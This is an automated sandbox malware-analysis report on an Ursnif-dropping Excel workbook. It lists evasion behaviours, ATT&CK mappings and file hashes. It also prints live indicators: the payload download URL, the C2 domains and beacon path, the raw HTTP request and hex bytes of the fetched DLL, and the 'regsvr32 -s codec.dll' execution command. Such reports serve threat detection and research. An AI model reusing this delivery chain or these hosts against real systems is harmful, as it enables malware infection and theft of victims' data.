                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2216 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2680 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms
                      Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C77FF FindFirstFileExA
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C5D2F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F85B0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F80E6 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F84DF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C36F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C3C18 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: app.updatebrouser.com
                      Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: apt.updateffboruse.com
                      Source: Yara match File source: app.xml, type: SAMPLE
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll
                      Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: !Progman
                      Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A105E GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA
                      Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2E33 cpuid
                      Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

                      Stealing of Sensitive Information:

                      Yara detected Ursnif
                      Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      Yara detected Ursnif
                      Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 41 | Path Interception | Process Injection 112 | Masquerading 121 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 21 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
                      Default Accounts | Native API 3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 1 | LSASS Memory | Security Software Discovery 11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Exploitation for Client Execution 43 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 36 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms | 37% | Metadefender | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms | 68% | ReversingLabs | Win32.Trojan.Ursnif |
                      C:\Users\Public\codec.dll | 37% | Metadefender | | Browse
                      C:\Users\Public\codec.dll | 68% | ReversingLabs | Win32.Trojan.Ursnif |

                      Unpacked PE Files

                      Source | Detection | Scanner | Label | Link | Download
                      6.2.regsvr32.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File

                      Domains

                      Source | Detection | Scanner | Label | Link
                      iqwasithealth.com | 7% | Virustotal | | Browse

                      URLs

                      Source | Detection | Scanner | Label | Link
                      http://www.%s.comPA | 0% | URL Reputation | safe |
                      https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms | 0% | Avira URL Cloud | safe |
                      http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcET | 0% | Avira URL Cloud | safe |
                      http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      iqwasithealth.com | 50.87.248.41 | true | true | | unknown
                      app.updatebrouser.com | unknown | unknown | true | | unknown
                      apt.updateffboruse.com | unknown | unknown | true | | unknown

                          Contacted URLs

                          Name | Malicious | Antivirus Detection | Reputation
                          https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms | true | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries

                          Name | Source | Malicious | Antivirus Detection | Reputation
                          http://www.%s.comPA | regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmp | false | | high
                          http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcET | regsvr32.exe, 00000006.00000002.673589094.0000000000518000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                          http://servername/isapibackend.dll | WMIC.exe, 00000003.00000002.415850120.0000000001B60000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.673734417.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673666693.0000000001CC0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                            Contacted IPs

                            Public

                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            50.87.248.41 | iqwasithealth.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | true

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:507191
                            Start date:21.10.2021
                            Start time:19:39:47
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:inquiry[2021.09.23_12-51].xlsb
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLSB@6/4@4/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 16% (good quality ratio 15.3%)
                            • Quality average: 80.1%
                            • Quality standard deviation: 27.8%
                            HCA Information:
                            • Successful, ratio: 63%
                            • Number of executed functions: 54
                            • Number of non-executed functions: 54
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xlsb
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                            • Not all processes where analyzed, report is missing behavior information

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            19:41:21 | API Interceptor | 19x Sleep call for process: WMIC.exe modified
                            19:42:22 | API Interceptor | 86x Sleep call for process: regsvr32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            50.87.248.41 | new_working_conditions[2021.09.23_12-51].xlsb | Get hash | malicious | Browse |

                              Domains

                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                              iqwasithealth.com | new_working_conditions[2021.09.23_12-51].xlsb | Get hash | malicious | Browse | 50.87.248.41

                              ASN

                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                              UNIFIEDLAYER-AS-1US

                              JA3 Fingerprints

                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                              7dcce5b76c8b17472d024758970a406b

                              Dropped Files

                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms | new_working_conditions[2021.09.23_12-51].xlsb | Get hash | malicious | Browse |
                              C:\Users\Public\codec.dll | new_working_conditions[2021.09.23_12-51].xlsb | Get hash | malicious | Browse |

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:downloaded
                                  Size (bytes):353792
                                  Entropy (8bit):6.649926576275444
                                  Encrypted:false
                                  SSDEEP:6144:8ufHKG+wtMydWttXtUxIhYD+BHi1RN5CA9fc0C5Na5uMt/bL22P:JqG+aMydWXX6Jqi1RJVcfN4pRLhP
                                  MD5:E7AC180E8217A97505FEE5B06709D331
                                  SHA1:85B078B46C648EC00DE6E1952E4D165EDBBC878E
                                  SHA-256:D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                                  SHA-512:CBDAB6A7E967CCCB6B5CD2E611B479B367EE3B160936EC697A6C929F8AD47F767A7C427AFEA04E192421F1C064B00773CD53344981755BD56A6448280AC09FE5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 37%, Browse
                                  • Antivirus: ReversingLabs, Detection: 68%
                                  Joe Sandbox View:
                                  • Filename: new_working_conditions[2021.09.23_12-51].xlsb, Detection: malicious, Browse
                                  Reputation:low
                                  IE Cache URL:https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE192CE4.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1179 x 832, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):560141
                                  Entropy (8bit):7.998249179675146
                                  Encrypted:true
                                  SSDEEP:12288:mQIo6UHg7xFXSW6ydUO0+EeL6p2cX3O15YhlN:mQwXtRGT+EeLe255y
                                  MD5:0D3A3E5416D7684E6A71C0F665F43363
                                  SHA1:A43A631379852A4371F1EFDBFCA94B2520BCBA46
                                  SHA-256:4B24CDA7EEC1834B1AF96DB036FE46B49EDC76802693ACDF4F10001627CB099D
                                  SHA-512:913CBE348B8B44B653A68A17FECCC0D4EDA567A8600F2C4C979F4D728E143008B3D279D7CFE558107F60E40119E01F124EB37B6DD2423D5CC11F34F974E19499
                                  Malicious:false
                                  Reputation:low
                                  C:\Users\user\Desktop\~$inquiry[2021.09.23_12-51].xlsb
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):165
                                  Entropy (8bit):1.4377382811115937
                                  Encrypted:false
                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  C:\Users\Public\codec.dll
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):353792
                                  Entropy (8bit):6.649926576275444
                                  Encrypted:false
                                  SSDEEP:6144:8ufHKG+wtMydWttXtUxIhYD+BHi1RN5CA9fc0C5Na5uMt/bL22P:JqG+aMydWXX6Jqi1RJVcfN4pRLhP
                                  MD5:E7AC180E8217A97505FEE5B06709D331
                                  SHA1:85B078B46C648EC00DE6E1952E4D165EDBBC878E
                                  SHA-256:D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                                  SHA-512:CBDAB6A7E967CCCB6B5CD2E611B479B367EE3B160936EC697A6C929F8AD47F767A7C427AFEA04E192421F1C064B00773CD53344981755BD56A6448280AC09FE5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 37%
                                  • Antivirus: ReversingLabs, Detection: 68%
                                  Joe Sandbox View:
                                  • Filename: new_working_conditions[2021.09.23_12-51].xlsb, Detection: malicious

                                  Static File Info

                                  General

                                  File type:Zip archive data, at least v2.0 to extract
                                  Entropy (8bit):7.997293747708592
                                  TrID:
                                  • Excel Microsoft Office Open XML Format document with Macro (51004/1) 34.81%
                                  • Excel Microsoft Office Binary workbook document (47504/1) 32.42%
                                  • Excel Microsoft Office Open XML Format document (40004/1) 27.30%
                                  • ZIP compressed archive (8000/1) 5.46%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:inquiry[2021.09.23_12-51].xlsb
                                  File size:591445
                                  MD5:d5dedf5221391bc183c80173ed5f4279
                                  SHA1:bc48802d095a79a9fb8196d35506c4862c937936
                                  SHA256:f2be1c567425b843b8deec064cd9f747d74f4ae5e15d026fcb5b26549ae3fba9
                                  SHA512:a5897ef999acb94b6badecac604832f9bd9537bac95172b4ae8b8e832d42d1cdb7107b5d1de84f1e4ec64357d9f3c5b63b3ad2393c9e5bf9b9e4b2979d011b52
                                  SSDEEP:12288:XJo6Chb0c7x1XSW6qdUO0+geLAo63jashmq4jBz:Xq9XtHGT+geLqaFZ
                                  File Content Preview:PK........e.4S................docProps/PK..........!.................docProps/app.xml.S.n.0.....`.^.Z.*d\.(U.n.*.....x...g.`.~M........7y~.b..]Y...Z....K8.g|j.f._V.W..!i...;..= .S_..E.....,J8.......&.Rc/..2....X...Yf..{.-...N.....K!..ZA..8...ESo...u......

                                  File Icon

                                  Icon Hash:e4e2ea8aa4b4b4b4

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets


                                  UDP Packets

                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Oct 21, 2021 19:40:37.892031908 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                  Oct 21, 2021 19:40:38.001221895 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                  Oct 21, 2021 19:41:50.414472103 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                  Oct 21, 2021 19:41:50.437865973 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                  Oct 21, 2021 19:42:10.523245096 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                  Oct 21, 2021 19:42:10.546617985 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
                                  Oct 21, 2021 19:42:30.637613058 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
                                  Oct 21, 2021 19:42:30.666851044 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22

                                  DNS Queries

                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                  Oct 21, 2021 19:40:37.892031908 CEST | 192.168.2.22 | 8.8.8.8 | 0x2a3d | Standard query (0) | iqwasithealth.com | A (IP address) | IN (0x0001)
                                  Oct 21, 2021 19:41:50.414472103 CEST | 192.168.2.22 | 8.8.8.8 | 0x4f8b | Standard query (0) | apt.updateffboruse.com | A (IP address) | IN (0x0001)
                                  Oct 21, 2021 19:42:10.523245096 CEST | 192.168.2.22 | 8.8.8.8 | 0xa13a | Standard query (0) | app.updatebrouser.com | A (IP address) | IN (0x0001)
                                  Oct 21, 2021 19:42:30.637613058 CEST | 192.168.2.22 | 8.8.8.8 | 0xb209 | Standard query (0) | apt.updateffboruse.com | A (IP address) | IN (0x0001)

                                  DNS Answers

                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                  Oct 21, 2021 19:40:38.001221895 CEST | 8.8.8.8 | 192.168.2.22 | 0x2a3d | No error (0) | iqwasithealth.com | | 50.87.248.41 | A (IP address) | IN (0x0001)
                                  Oct 21, 2021 19:41:50.437865973 CEST | 8.8.8.8 | 192.168.2.22 | 0x4f8b | Name error (3) | apt.updateffboruse.com | none | none | A (IP address) | IN (0x0001)
                                  Oct 21, 2021 19:42:10.546617985 CEST | 8.8.8.8 | 192.168.2.22 | 0xa13a | Name error (3) | app.updatebrouser.com | none | none | A (IP address) | IN (0x0001)
                                  Oct 21, 2021 19:42:30.666851044 CEST | 8.8.8.8 | 192.168.2.22 | 0xb209 | Name error (3) | apt.updateffboruse.com | none | none | A (IP address) | IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • iqwasithealth.com

                                  HTTPS Proxied Packets

                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  0 | 192.168.2.22 | 49165 | 50.87.248.41 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Timestamp | kBytes transferred | Direction | Data
                                  2021-10-21 17:40:38 UTC | 0 | OUT | GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: iqwasithealth.com
                                  Connection: Keep-Alive
                                  2021-10-21 17:40:38 UTC | 0 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 21 Oct 2021 17:40:38 GMT
                                  Server: Apache
                                  Upgrade: h2,h2c
                                  Connection: Upgrade, close
                                  Last-Modified: Wed, 22 Sep 2021 11:30:59 GMT
                                  Accept-Ranges: bytes
                                  Content-Length: 353792
                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                  Referrer-Policy:
                                  2021-10-21 17:40:39 UTC78INData Raw: 74 24 4b 89 24 0f eb 24 c4 eb 89 94 00 08 c6 5c 2c c7 00 ff 48 4d 48 cc c0 3d d0 02 8b 8b e8 8d 48 8d 4d 1b 44 00 40 ff 24 8d 01 00 c0 24 0f 89 00 4e 8b 00 45 57 2f 48 60 48 49 83 00 c0 90 15 f1 0a 08 49 00 8c ab f6 48 cc 40 15 ff 4c 01 48 70 48 00 00 48 53 33 ff 70 ce 15 45 8d d0 74 89 48 8b 48 ff 0f 83 4b 8b 8f cc 8b 48 8b 83 e4 48 24 ff 15 75 ff 89 00 fe 8d 48 4c 3b 05 ec 00 89 8d 53 c7 c0 83 c0 48 15 48 49 ff 00 8b 00 43 49 3b d0 00 8b 48 48 c7 48 5c 00 56 80 8d 83 00 48 48 8b 45 83 48 9b 74 27 5e c9 15 4d 0b 70 49 cc c8 15 ff 01 48 85 15 74 8d 83 8d 8d ff 48 c3 5e 48 48 48 00 8b 48 8d d7 8b 8d 8d 00 00 af ff 4c 4b ff 00 08 60 00 48 d2 40 ff ff 8d 48 00 8b 70 24 c7 00 00 b0 0c 48 48 c8 c0 44 8b 5c 00 89 c3 48 f0 bb e8 8b 8d 48 8b c9 d0 d0 15 8b e8 58
                                  Data Ascii: t$K$$\,HMH=HMD@$$NEW/H`HIIH@LHpHHS3pEtHHKHH$uHL;SHHICI;HHH\VHHEHt'^MpIHtH^HHHHLK`H@Hp$HHD\HHX
                                  2021-10-21 17:40:39 UTC86INData Raw: e3 98 8b 41 cc 01 fa 00 d4 48 15 ec cc 24 83 a6 ff e0 24 40 24 48 c3 08 18 48 33 00 cc 07 01 01 17 09 ff 13 cc 38 33 00 ff 8d 58 de 8d 48 bf 15 29 85 85 ff 00 44 ff 21 3c 00 c7 45 c9 48 48 00 00 fe 00 90 cc 48 ff 40 4b f6 cc ff 8d ff cc 66 4b 8b 90 5d 8b 0f 18 00 29 00 cc 24 cc 48 06 e8 48 cc 3d 48 8b b3 15 ff 56 4b 48 ff 5c 74 cc 07 d6 2e 24 48 94 90 cc 15 48 27 00 01 ff eb 00 ff 89 cc 15 fe d7 c7 cc 60 cc 05 a4 1d 4c fe 75 cc 5c 10 0a 4c 48 85 48 f0 8b 24 48 20 44 74 00 24 20 e8 48 43 30 21 c7 83 48 8b 48 9f f8 68 15 cc 9c 00 85 48 00 00 f8 d8 89 00 24 24 05 05 37 ce 48 31 ff 48 0c 48 56 8b 0a 24 8b 40 53 92 c0 db 74 48 2b 75 24 47 83 cc 74 93 24 45 24 8d 2d 48 ff cc 00 ff 48 4b 48 48 10 ff 4c cc ff 8b c9 c7 e8 8b 4d 4c 00 c8 fd 4c c2 cc 00 49 00 f2 23
                                  Data Ascii: AH$$@$HH383XH)D!<EHHH@KfK])$HH=HVKH\t.$HH'`Lu\LHH$H Dt$ HC0!HHhH$$7H1HHV$@StH+u$Gt$E$-HHKHHLMLLI#
                                  2021-10-21 17:40:39 UTC94INData Raw: 4f 15 cc 48 15 1b 8d ff 98 85 90 ff 22 48 24 89 57 48 d0 9a 8b cc 15 8d cc 00 4c 00 cc 00 c2 8b 2f 89 53 eb c4 47 8d ff 44 00 8d 47 d6 5b 05 24 cc 00 03 48 0b 24 b6 48 20 00 48 b6 0c 24 48 fa 44 00 48 40 8b 18 49 15 07 cc cc 8b 48 cc 21 48 48 48 48 4c 8b 24 00 8b 80 f0 f4 00 30 30 8d 57 cc ff 48 58 20 8d 48 48 8b 74 68 00 c7 ff 20 8d 5b 30 ab c0 c7 00 bc 00 7d 83 8b 48 18 c6 3b 28 24 43 90 00 00 ff 28 2f 8d 87 cb 8b 48 cc 08 98 8b 74 00 5c ba cc 8d f1 48 59 8d ff 47 d4 24 4c 24 c6 4b 10 24 8b 4d 41 84 00 04 8b 49 8b 8d f7 f6 48 30 13 ff 13 48 00 c7 41 8b 8d 00 cc 83 5b 48 43 52 44 5c 8b 8d 0f cf 2d c7 f9 04 07 03 ba cc 44 00 ce 10 40 05 20 11 48 a8 ff 59 48 85 30 48 ff 48 48 c9 00 8b 12 60 c2 00 c6 8b ff 89 cc e3 80 4c 8d 24 cc 00 10 fe 00 ff 00 00 86 4c
                                  Data Ascii: OH"H$WHL/SGDG[$H$H H$HDH@IH!HHHHL$00WHX HHth [0}H;($C(/Ht\HYG$L$K$MAIH0HA[HCRD\-D@ HYH0HHH`L$L
